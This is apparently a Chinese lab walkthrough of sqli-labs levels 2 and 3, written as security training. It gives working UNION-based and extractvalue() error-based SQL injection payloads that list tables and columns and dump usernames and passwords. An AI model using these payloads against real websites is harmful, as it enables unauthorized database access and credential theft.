环境:本地环境,基于sqli-labs1.sqli-labs第二关(基于get的整数型注入)

　　通过代码审计,或者回显可以看出,输入的内容被原封不动的带入到数据库中,这种也叫数字型注入

　　我这里其实是可以直接获取到用户名和密码,但是为了那些个小白呢,我从头开始吧

　　1.1 获取数据库

　　构造sql:

　　id=81 union select 1,2,database() -- +

　　1.2 获取数据库的表

　　构造sql:

　　?id=81 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database() )-- +

　　1.3 获取user表里的字段信息

　　构造sql:

　　?id=81 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users' ) -- +

　　1.4 获取users表里字段获取用户名和密码

　　构造sql:

　　?id=81 union select 1,2,(select group_concat(username,'::',password) from users) -- +

　　这里可以看到,用户名和密码了,结束了,再来看第二种方法,手工报错注入试试,主要是练习使用

　　另外的方法

　　构造sql:

　　?id=1 and extractvalue(1,concat(0x58,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('first_name','last_name')))) -- +

　　获取用户名和密码,和上面一样,这里就不截图了2. sqli-labs第三关 get 下单引号变形引发的sql注入

　　经过测试和代码审计可以看出,输入1'时 会报错,出现了)这个,所以再一类构造减肥参数时需要 加入 ')来闭合才能执行成功,有正常的回显

　　2.1 我这里就直接获取用户表里的列

　　构造sql

　　?id=-1' ) union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') -- +

　　2.2 获取用户名和密码

　　构造sql:

　　?id=-1' ) union select 1,2,(select group_concat(username,0x23,password) from users) -- +

　　另外一种方法:使用extractvalue()来实现

　　构造sql

　　id=1' ) and extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user_id','first_name','last_name','user','fail') ))) -- +

　　获取用户名和密码

　　构造sql

　　?id=1' ) and extractvalue(1,concat(0x23,(select group_concat(username,0x23,password) from users ))) -- +